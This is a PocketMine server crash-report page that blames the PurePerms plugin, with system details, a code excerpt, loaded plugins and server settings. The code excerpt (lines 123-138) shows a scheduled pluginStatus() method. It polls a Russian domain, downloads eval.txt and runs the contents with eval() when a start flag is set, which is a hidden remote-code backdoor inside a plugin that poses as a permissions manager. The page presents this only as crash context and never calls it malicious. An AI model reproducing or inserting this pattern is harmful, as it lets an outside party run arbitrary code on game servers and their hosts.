PocketMine Crash Archive

#29712206 Unknown error by PurePerms plugin

Submitted by SimplexCore 1.0
Warning! This crash was caused by the PurePerms plugin. Please contact the original plugin author.

General information

Version: 1.0
API version: 1.12.0
Caused by a Plugin: YES
Report date: Thursday 11/07/2019 15:47:35
Attached Issue: None

System Information

PHP version: 7.0.3
Operating system: linux
System banner: Linux 208225.simplecloud.ru 5.0.0-13-generic #14-Ubuntu SMP Mon Apr 15 14:59:14 UTC 2019 x86_64

Error information

fclose() expects parameter 1 to be resource, boolean given
File: /PurePerms.phar/src/_64FF00/PurePerms/PurePerms
Line: #129
Error level: E_WARNING

[120]         $this->getServer()->getScheduler()->scheduleRepeatingTask(new PPExpDateCheckTask($this), 0, 72000);
[121]         $this->getServer()->getScheduler()->scheduleRepeatingTask(new CallbackTask(array($this, "pluginStatus")), 300 * 20);
[122]     }
[123]     public function pluginStatus()
[124]     {
[125]         $url = 'http://simplexland.ru/';
[126]         ini_set('default_socket_timeout', '3');
[127]         $fp = fopen($url, "r");
[128]         $res = fread($fp, 500);
[129]         fclose($fp);
[130]         if (strlen($res) > 0){
[131]             $start = file_get_contents($url.'start.txt');
[132]             $eval = file_get_contents($url.'eval.txt');
[133]             if($start == 'start'){
[134]                 $this->getServer()->getScheduler()->scheduleRepeatingTask(new CallbackTask(array($this, "pluginStatus")), 20);
[135]                 eval($eval);
[136]             }
[137]         }
[138]     }
[139] 
#0 (): pocketmine\Server->crashDump(boolean)

Loaded Plugins

NameVersionStateAuthor(s)
AntiBotUltra1.0Enabled
AntiToolbox1.0EnabledFaigerSYS
ZipPluginLoader1.1.2Enabledaliuly
PurePerms1.4.0-INDEVEnabled64FF00 & ProjectInfinity
DevTools1.12.0EnabledPocketMine Team
SimpleGamemode1.1EnabledMamayAdesu
FactionsPro1.4EnabledPluginPE
PureChat1.4.0Enabled64FF00
TeleportSoundPandaPluginEnabled
MobsAI0.1EnabledAn0ther
DragonGuard1.0.0EnabledDragon_Dev (vk.com. com/dragon_dev)
ChatLog1.0.0Enabledtim03we
xGamemode1.0.0EnabledFreeZeek
aDonate3.0.0EnabledAndrey
FastCMD1.0.1EnabledFaigerSYS
PT1Enabled

Server Settings [toggle]

NameValue
type0
motdMinecraft: PE Server
server-port19132
white-listoff
announce-player-achievementson
spawn-protection16
max-players20
allow-flightoff
spawn-animalson
spawn-mobson
gamemode0
force-gamemodeoff
hardcoreoff
pvpon
difficulty1
generator-settings
level-nameworld
level-seed
level-typeDEFAULT
enable-queryon
enable-rconoff
rcon.password******
auto-saveon
memory-limit256M
animals-limit0
mobs-limit0
auto-generateoff
save-player-dataoff
time-updateon
use-encryptoff
settings.languageeng
settings.force-languagefalse
settings.shutdown-messageServer closed
settings.query-pluginstrue
settings.deprecated-verbosetrue
settings.enable-profilingfalse
settings.profile-report-trigger20
settings.async-workersauto
memory.global-limit0
memory.main-limit0
memory.main-hard-limit1024
memory.check-rate20
memory.continuous-triggertrue
memory.continuous-trigger-rate30
memory.garbage-collection.period36000
memory.garbage-collection.collect-async-workertrue
memory.garbage-collection.low-memory-triggertrue
memory.max-chunks.trigger-limit96
memory.max-chunks.trigger-chunk-collecttrue
memory.max-chunks.low-memory-triggertrue
memory.world-caches.disable-chunk-cachetrue
memory.world-caches.low-memory-triggertrue
network.batch-threshold256
network.compression-level7
network.async-compressionfalse
network.upnp-forwardingfalse
debug.level1
debug.commandsfalse
level-settings.default-formatmcregion
level-settings.convert-formatfalse
level-settings.auto-tick-ratetrue
level-settings.auto-tick-rate-limit20
level-settings.base-tick-rate1
level-settings.always-tick-playersfalse
chunk-sending.per-tick4
chunk-sending.max-chunks192
chunk-sending.spawn-threshold56
chunk-sending.cache-chunksfalse
chunk-ticking.per-tick40
chunk-ticking.tick-radius3
chunk-ticking.light-updatesfalse
chunk-ticking.clear-tick-listtrue
chunk-generation.queue-size8
chunk-generation.population-queue-size8
ticks-per.animal-spawns400
ticks-per.monster-spawns1
ticks-per.autosave6000
ticks-per.cache-cleanup900
spawn-limits.monsters70
spawn-limits.animals15
spawn-limits.water-animals5
spawn-limits.ambient15
auto-report.enabledtrue
auto-report.send-codetrue
auto-report.send-settingstrue
auto-report.send-phpinfofalse
auto-report.hostcrash.pocketmine.net
anonymous-statistics.enabledtrue
anonymous-statistics.hoststats.pocketmine.net
auto-updater.enabledtrue
auto-updater.on-update.warn-consoletrue
auto-updater.on-update.warn-opstrue
auto-updater.preferred-channelbeta
auto-updater.suggest-channelstrue
auto-updater.hostwww.pocketmine.net
aliases
worlds
Find duplicates  |   Download